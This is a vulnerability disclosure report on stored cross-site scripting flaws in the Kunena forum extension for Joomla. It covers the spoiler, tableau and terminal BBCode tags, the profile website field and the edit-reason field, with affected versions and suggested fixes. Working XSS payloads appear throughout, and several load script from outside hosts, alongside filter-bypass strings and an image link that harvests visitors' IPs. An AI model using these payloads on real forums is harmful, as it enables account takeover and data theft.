security-report_kunena_oct_2022.md

$$ \colorbox{#032}{\colorbox{#011}{\colorbox{#000}{$\kern{1.2em}\color{#eee}\begin{matrix}\newline\textsf{Security Report}\newline\textsf{Kunena}\newline\textsf{October 2022$\cdot$Slowftw}\newline{}\end{matrix}\kern{1.2em}$}}} $$

Index

1. Introduction
2. Severity Glossary
3. Identified Vulnerabilities
   1. Stored XSS: '[spoiler]' BBCode Tag $\small(\textcolor{#DF2935}{\sf{High}})$
   2. Stored XSS: '[tableau]' BBCode Tag $\small(\textcolor{#DF2935}{\sf{High}})$
   3. Stored XSS: '[terminal]' BBCode Tag $\small(\textcolor{#DF2935}{\sf{High}})$
   4. Stored XSS: Website URL in User Profile $\small(\textcolor{#FF6F22}{\sf{Medium}})$
   5. Stored XSS: Edit Reason in Topic Message $\small(\textcolor{#FF6F22}{\sf{Medium}})$
4. Miscellaneous Issues
   1. Bypassing removeLinksInMessage function $\small(\textcolor{#DBDD2D}{\sf{Low}})$
   2. No proxy in '[img]' BBCode Tag $\small(\textcolor{#318EB1}{\sf{Info}})$

Introduction

"Kunena is the leading Joomla forum component. Downloaded more than 8M times in 11 years, Kunena is the only forum/discussion solution for Joomla that is community driven - true open source - public self-help forums, GitHub and documentation Wiki."

_{— extensions.joomla.org/extension/kunena}

This document describes the results of independent research on vulnerabilities in The Kunena Project in October 2022 by Slowftw for self-learning, with no org or team involved. Tests and analysis were done using two versions of Joomla and Kunena in different directories of the same localhost website with the following specifications:

Tested Environment Info

1. Joomla! version:
   1. 3.10.11
   2. 4.2.3
2. Kunena version:
   1. 5.2.10.1 [Queiriga]
   2. 6.0.3 [Git Repository]
3. Default template:
   1. Joomla!:
      1. protostar 1.0
      2. cassiopeia 1.0
   2. Kunena:
      1. crypsis 5.2.10.1
      2. Aurelia 6.0.3
4. Platform:
   1. Win10x64Xampp
   2. Apache/2.4.47
   3. OpenSSL/1.1.1k
   4. PHP/8.0.6
5. MySQL version:
   1. 5.5.5-10.4.19-MariaDB

Severity Glossary

This section does not detail all existing severity levels but only those assigned to the issues discovered in this report. Details have been modified for this specific report and do not refer to general description of severity or risk.

🔴 $\small\textcolor{#DF2935}{\sf{High}}$: Categorizes issues that allow attackers to control or have limited access to sensitive areas and information, e.g., administrative cookies, which can cause account compromise and leakage of confidential information without user interaction.
🟠 $\small\textcolor{#FF6F22}{\sf{Medium}}$: Categorizes issues in the same way as High, but requires user interaction to trigger.
🟡 $\small\textcolor{#DBDD2D}{\sf{Low}}$: Categorizes issues that facilitated the exploitation of identified vulnerabilities.
🔵 $\small\textcolor{#318EB1}{\sf{Info}}$: Categorizes issues considered purely informational, protection recommendations or improvements that can generally improve security/privacy posture.

Identified Vulnerabilities

🔴Stored XSS: '[spoiler]' BBCode Tag

Affected versions: 5.1.15 through 5.x
Release Note 5.1.14 - 1c57e85
Release Note 5.1.15 - 4006d58

Issue

The title is not escaped/encoded as an HTML entity. It was previously reported on 13 August 2019 by Andrey Skuratov and fixed using htmlspecialchars, but it was reversed days later by replacing it with a blacklist using the regex #<script(.*?)>(.*?)</script>#is.

Steps to Reproduce

1. Create an account if necessary;
2. Create a topic or anything else that makes BBCode process;
3. Paste the payload into the topic content.

Payload examples

1. Bypassing regex:
   1. [spoiler="<script/src=//15.rs></script/>"][/spoiler]
   2. [spoiler="<<script></script>script/src=//15.rs></script>"][/spoiler]
2. Event handler of other HTML tags:
   1. [spoiler="<img/src/onerror=jQuery.getScript`//15.rs`>"][/spoiler]
   2. [spoiler="<svg/onload=jQuery.getScript`//15.rs`>"][/spoiler]
   3. [spoiler="<audio/src/onerror=jQuery.getScript`//15.rs`>"][/spoiler]
   4. [spoiler="<details/open/ontoggle=jQuery.getScript`//15.rs`></details>"][/spoiler]
   5. more and more

If links are being removed it can be bypassed using encoded dot like %2E, \x2E, &#x2E; or other techniques.

Mitigation

Remove regex blacklist and escape/encode spoiler title as HTML entity. Don’t try to sanitize input. Escape output., e.g.:

$default = $default ? htmlspecialchars($default, ENT_COMPAT, 'UTF-8') : Text::_('COM_KUNENA_BBCODE_SPOILER');
$hidden = ($document instanceof \Joomla\CMS\Document\HtmlDocument);
$layout = KunenaLayout::factory('BBCode/Spoiler');
if ($layout->getPath())
{
	return (string) $layout
		->set('title', $default)
		->set('hidden', $hidden)
		->set('content', $content)
		->set('params', $params);
}

🔴Stored XSS: '[tableau]' BBCode Tag

Affected versions: 1.6.0 through 5.x, 6.x
Release Note 1.6.0 - ca36e85

Issue

It is not safe to let users control the domain that is inserted into the src of the script tag.

Steps to Reproduce

1. Create an account if necessary;
2. Create a topic or anything else that makes BBCode process;
3. Paste the payload into the topic content.

Payload example

1. Ignoring file path with query string ?:
   1. [tableau]https://15.rs?//?:toolbar=no[/tableau]

Mitigation

Prevent normal users from controlling the script path/domain
or maybe disable/remove this BBCode tag because it's not in any of the default editors/template.

🔴Stored XSS: '[terminal]' BBCode Tag

Affected versions: 2.0.0 through 5.x, 6.x
Release Note 2.0.0 - a93ee55

Issue

The colortext is not properly filtered as a valid CSS Hex Color.

Steps to Reproduce

1. Create an account if necessary;
2. Create a topic or anything else that makes BBCode process;
3. Paste the payload into the topic content.

Payload examples

1. Perceptive:
   1. [terminal colortext='"><script/src=//15.rs></script>'][/terminal]
2. Imperceptible:
   1. [terminal colortext='red"><script/src=//15.rs></script>cmd<x/'][/terminal]

Mitigation

Filter the colortext as valid css hex color, e.g., using regex: ^#[[:xdigit:]]{3,8}$. If regex will not be used, keep in mind that it is possible to insert new elements in the style of the pre tag, e.g.: [terminal colortext=";background:url(//x55.is"][/terminal].

🟠Stored XSS: Website URL in User Profile

Affected versions: 4.0.0-BETA1 through 5.x, 6.x
Release Note 4.0 - 2c9b492#L165-L168

Issue

The websiteURL is not encoded before being inserted into the href of the anchor tag, so it is possible to close it and create new unsafe attributes, e.g., onmouseover. Unable to create new tags because of the strip function.

Steps to Reproduce

1. Create an account if necessary;
2. Edit your user (e.g. in /forum/user/edit/);
3. Paste the payload into the Website URL.

Payload examples

1. Short domain/payload:
   1. http://0/"onmouseover="jQuery.getScript`//15.rs`
2. To increase the payload size (e.g. for a big domain name),
   inspect and remove type="url" from #social-url element:
   1. "onclick="jQuery.getScript`//xss.rocks/xss.js`

default type/length for websiteurl: varchar(50)

Mitigation

Escape/Encode websiteURL as HTML entity.

🟠Stored XSS: Edit Reason in Topic Message

Affected versions: 2.0.0? through 5.x
Release Note 2.0.0 - 8a9d3d9#L195

Issue

The modified_reason is not encoded before being inserted into the value of the input tag, so it is possible to close it and create new unsafe attributes, e.g., onmouseover. Unable to create new tags because of the strip function. The payload is visible in the topic message, but if the admin/mod opens it directly through the link (e.g. in /forum/test/1-2/edit/3) the chances of an attack increase.

Steps to Reproduce

1. Create an account if necessary;
2. Create/post a topic message;
3. Edit the created message;
4. Paste the payload into the Reason for editing.

Payload examples

1. Low probability of user interaction:
   1. "onmouseover="alert()
2. High probability of user interaction:
   1. "onmouseover="alert()"style="top:0;left:0;width:100%;height:100%;position:fixed;z-index:11

Mitigation

Escape/Encode modified_reason as HTML entity.

Miscellaneous Issues

🟡Bypassing removeLinksInMessage function

Affected File/Code
ed1a402#L1011

Issue

This function was created to remove images and links from newly registered users, but it is possible to bypass the regex blacklist and exploit identified issues/vulnerabilities further. * Auto-Link URLs option must be enabled.

Payload Examples

1. IP Address
   1. http://1.1.1.1/ *
   2. [URL="1.1.1.1"]test[/URL]
   3. [url="1.1.1.1"]test[/url=]
   4. [url =1.1.1.1]test[/url] _{space before the equal sign}
   5. [[url=][/url]url=1.1.1.1]test[/url]
   6. [img]http://1.1.1.1/file~.png[/img]
   7. [IMG]http://1.1.1.1/file~.png[/IMG]
2. Accent Domain
   1. http://café.fr/ *
   2. [url="café.fr"]test[/url=]
3. Unicode Domain Name
   1. http://ストア.com/ *
   2. [url="ストア.com"]test[/url=]
   3. http://⑮.rs/ *
   4. [url="⑮.rs"]test[/url=]
4. Unicode TLD
   1. http://中央电视台.中国/ *
   2. [url="中央电视台.中国"]test[/url=]

Mitigation

Blacklisting with Regex in this case is difficult and fails.
Generate the HTML from BBCode and then remove the desired HTML tags, e.g.:

$text = KunenaHtmlParser::parseBBCode($text);
$text = preg_replace('/<div class="kmsgimage">.*?<\/div>|<a .*?<\/a>/s', '', $text);

🔵No proxy in '[img]' BBCode Tag

Affected File/Code
ed1a402#L2625

Issue

Why and what is a forward/reverse proxy?
There is no proxy between the user and the image's web server, so some privacy information may be exposed, such as the user's IP, referer, user agent, etc... A newly created user could use the previous issue to abuse this one.

Payload Examples

1. Stealing IP and browser info:
   1. [img]https://505.netlify.app/.png[/img]

Mitigation

I recommend wsrv.nl as it is a free, fast and open-source long-standing image caching and manipulation service.
The idea is to prefix the src of user-controlled images, e.g.:

<!-- [img]https://example.org/1.png[/img] -> urlencode() -->
<img src="https://wsrv.nl/?n=-1&default=placekitten.com/128&url=https%3A%2F%2Fexample.org%2F1.png">
<!--
"?n=-1"      = no static gifs
"&default="  = fallback if image breaks
"&url="      = image to be processed. urlencode() is optional, if not used, users can add more
               parameters to the service, e.g.: [img]https://example.org/1.png&filt=greyscale&x=.png[/img]
-->
<img src="https://wsrv.nl/?n=-1&default=placekitten.com/128&url=https://example.org/1.png&filt=greyscale&x=.png">

A internal proxy function may require a lot of resources and development time, but here is some examples and articles about:

• https://github.com/atmos/camo
• https://github.com/search?q=image+proxy&type=Repositories
• https://gist.github.com/e141c4aca4ca1f3bd8a2c04877f4b26e#gistcomment-3782844 (no HMAC)
• https://github.blog/2010-11-13-sidejack-prevention-phase-3-ssl-proxied-assets/
• https://github.blog/2014-01-28-proxying-user-images/